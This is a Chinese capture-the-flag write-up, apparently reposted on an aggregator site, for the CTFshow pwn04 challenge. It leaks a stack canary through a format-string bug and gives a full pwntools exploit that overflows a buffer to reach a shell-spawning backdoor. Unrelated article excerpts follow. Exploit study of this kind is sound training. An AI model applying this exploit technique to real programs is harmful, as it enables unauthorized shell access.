Pwn刷题记录(不停更新)

2024-06-23 20:04
文章标签 记录 更新 刷题 pwn 不停

本文主要是介绍Pwn刷题记录(不停更新),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1、CTFshow-pwn04(基础canary)

​ 好久没碰过pwn了,今天临时做一道吧,毕竟刚联合了WSL和VSCode,想着试着做一道题看看,结果随手一点,就是一个很少接触的,拿来刷刷:

​ 先查看下保护:

root@MSI:/home/g01den/Temp# checksec pwn
[*] '/home/g01den/Temp/pwn'Arch:     i386-32-littleRELRO:    Partial RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x8048000)

​ 除了NX之外,似乎就只有 Canary了。反编译看看:

​ 有用的只有vuln函数:

unsigned int vuln()
{int i; // [esp+4h] [ebp-74h]char buf[100]; // [esp+8h] [ebp-70h] BYREFunsigned int v3; // [esp+6Ch] [ebp-Ch]v3 = __readgsdword(0x14u);for ( i = 0; i <= 1; ++i ){read(0, buf, 0x200u);printf(buf);}return __readgsdword(0x14u) ^ v3;
}

​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。

​ 因此,思路就很明确了。

​ 之后通过disass vuln 查看汇编代码,发现了重要的一个内容,它在 ret 之前进行了一次异或,且指定的内存为[ebp-0xc]:

   0x08048677 <+73>:    nop0x08048678 <+74>:    mov    eax,DWORD PTR [ebp-0xc]0x0804867b <+77>:    xor    eax,DWORD PTR gs:0x140x08048682 <+84>:    je     0x8048689 <vuln+91>0x08048684 <+86>:    call   0x8048450 <__stack_chk_fail@plt>0x08048689 <+91>:    leave  0x0804868a <+92>:    ret 

​ 由此可知,cannary存放的地址就是[ebp-0xc],看一下:

1f:007c│-00c 0xffffd56c ◂— 0x7493ea00
20:0080│-008 0xffffd570 —▸ 0x8048768 ◂— dec eax /* 'Hello Hacker!' */
21:0084│-004 0xffffd574 ◂— 0xa0000
22:0088│ ebp 0xffffd578 —▸ 0xffffd598 ◂— 0

​ 目测cannary的值为0x7493ea00,那么, 想要泄露这个值,需要使用格式化字符串来泄露,那么,来判断下对不对吧,我们输入%31$x即可泄露:

在这里插入图片描述

​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。

​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。

​ 由于存在后门函数,所以exp如下:

from pwn import *#context.terminal = ["tmux", "splitw", "-h"]
Locale = 0if Locale == 1:io = process('./pwn')
else:io = remote('pwn.challenge.ctf.show',28203)context(arch='i386', os='linux', log_level='debug')io.recv()
payload1 = b"%31$x"
io.sendline(payload1)
io.recvuntil(b'\n')
canary = int(io.recvuntil(b'\n'),16)getshell_addr = 0x0804859Bpayload = b"a"*100 + p32(canary) + b'a'*12 + p32(getshell_addr)
io.sendline(payload)io.interactive()

这篇关于Pwn刷题记录(不停更新)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1088138

相关文章

poj3468(线段树成段更新模板题)

题意:包括两个操作:1、将[a.b]上的数字加上v;2、查询区间[a,b]上的和 下面的介绍是下解题思路: 首先介绍  lazy-tag思想:用一个变量记录每一个线段树节点的变化值,当这部分线段的一致性被破坏我们就将这个变化值传递给子区间,大大增加了线段树的效率。 比如现在需要对[a,b]区间值进行加c操作,那么就从根节点[1,n]开始调用update函数进行操作,如果刚好执行到一个子节点,

hdu1394(线段树点更新的应用)

题意:求一个序列经过一定的操作得到的序列的最小逆序数 这题会用到逆序数的一个性质,在0到n-1这些数字组成的乱序排列,将第一个数字A移到最后一位,得到的逆序数为res-a+(n-a-1) 知道上面的知识点后,可以用暴力来解 代码如下: #include<iostream>#include<algorithm>#include<cstring>#include<stack>#in

hdu1689(线段树成段更新)

两种操作:1、set区间[a,b]上数字为v;2、查询[ 1 , n ]上的sum 代码如下: #include<iostream>#include<algorithm>#include<cstring>#include<stack>#include<queue>#include<set>#include<map>#include<stdio.h>#include<stdl

hdu 1754 I Hate It(线段树,单点更新,区间最值)

题意是求一个线段中的最大数。 线段树的模板题,试用了一下交大的模板。效率有点略低。 代码: #include <stdio.h>#include <string.h>#define TREE_SIZE (1 << (20))//const int TREE_SIZE = 200000 + 10;int max(int a, int b){return a > b ? a :

AI行业应用(不定期更新)

ChatPDF 可以让你上传一个 PDF 文件,然后针对这个 PDF 进行小结和提问。你可以把各种各样你要研究的分析报告交给它,快速获取到想要知道的信息。https://www.chatpdf.com/

GIS图形库更新2024.8.4-9.9

更多精彩内容请访问 dt.sim3d.cn ,关注公众号【sky的数孪技术】,技术交流、源码下载请添加微信:digital_twin123 Cesium 本期发布了1.121 版本。重大新闻,Cesium被Bentley收购。 ✨ 功能和改进 默认启用 MSAA,采样 4 次。若要关闭 MSAA,则可以设置scene.msaaSamples = 1。但是通过比较,发现并没有多大改善。

Node.js学习记录(二)

目录 一、express 1、初识express 2、安装express 3、创建并启动web服务器 4、监听 GET&POST 请求、响应内容给客户端 5、获取URL中携带的查询参数 6、获取URL中动态参数 7、静态资源托管 二、工具nodemon 三、express路由 1、express中路由 2、路由的匹配 3、路由模块化 4、路由模块添加前缀 四、中间件

JavaFX应用更新检测功能(在线自动更新方案)

JavaFX开发的桌面应用属于C端,一般来说需要版本检测和自动更新功能,这里记录一下一种版本检测和自动更新的方法。 1. 整体方案 JavaFX.应用版本检测、自动更新主要涉及一下步骤: 读取本地应用版本拉取远程版本并比较两个版本如果需要升级,那么拉取更新历史弹出升级控制窗口用户选择升级时,拉取升级包解压,重启应用用户选择忽略时,本地版本标志为忽略版本用户选择取消时,隐藏升级控制窗口 2.

记录每次更新到仓库 —— Git 学习笔记 10

记录每次更新到仓库 文章目录 文件的状态三个区域检查当前文件状态跟踪新文件取消跟踪(un-tracking)文件重新跟踪(re-tracking)文件暂存已修改文件忽略某些文件查看已暂存和未暂存的修改提交更新跳过暂存区删除文件移动文件参考资料 咱们接着很多天以前的 取得Git仓库 这篇文章继续说。 文件的状态 不管是通过哪种方法,现在我们已经有了一个仓库,并从这个仓

消除安卓SDK更新时的“https://dl-ssl.google.com refused”异常的方法

消除安卓SDK更新时的“https://dl-ssl.google.com refused”异常的方法   消除安卓SDK更新时的“https://dl-ssl.google.com refused”异常的方法 [转载]原地址:http://blog.csdn.net/x605940745/article/details/17911115 消除SDK更新时的“